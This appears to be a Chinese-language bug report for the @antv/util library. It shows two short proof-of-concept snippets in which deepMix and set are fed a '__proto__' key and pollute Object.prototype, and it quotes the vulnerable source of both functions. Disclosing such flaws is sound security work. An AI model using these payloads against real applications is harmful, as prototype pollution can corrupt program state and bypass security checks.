复现代码1:
let deepMix = require("@antv/util").deepMix;
let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');
let obj = {};
deepMix(obj, BAD_JSON);
console.log({}.test); // 123问题代码:
|
const deepMix = function (rst: any, ...args: any[]) { |
|
for (let i = 0; i < args.length; i += 1) { |
|
_deepMix(rst, args[i]); |
|
} |
|
return rst; |
|
}; |
复现代码2:
let set = require("@antv/util").set;
let obj = {};
set(obj, "__proto__.test", 123);
console.log({}.test); // 123问题代码:
|
/** |
|
* https://github.com/developit/dlv/blob/master/index.js |
|
* @param obj |
|
* @param path |
|
* @param value |
|
*/ |
|
export default (obj: any, path: string | any[], value: any): any => { |
|
let o = obj; |
|
|
|
const keyArr = isString(path) ? path.split('.') : path; |
|
|
|
keyArr.forEach((key: string | number, idx: number) => { |
|
// 不是最后一个 |
|
if (idx < keyArr.length - 1) { |
|
if (!isObject(o[key])) { |
|
o[key] = isNumber(keyArr[idx + 1]) ? [] : {}; |
|
} |
|
o = o[key]; |
|
} else { |
|
o[key] = value; |
|
} |
|
}); |
|
|
|
return obj; |
|
}; |
复现代码1:
问题代码:
util/src/lodash/deep-mix.ts
Lines 42 to 47 in c499a30
复现代码2:
问题代码:
util/src/lodash/set.ts
Lines 5 to 29 in c499a30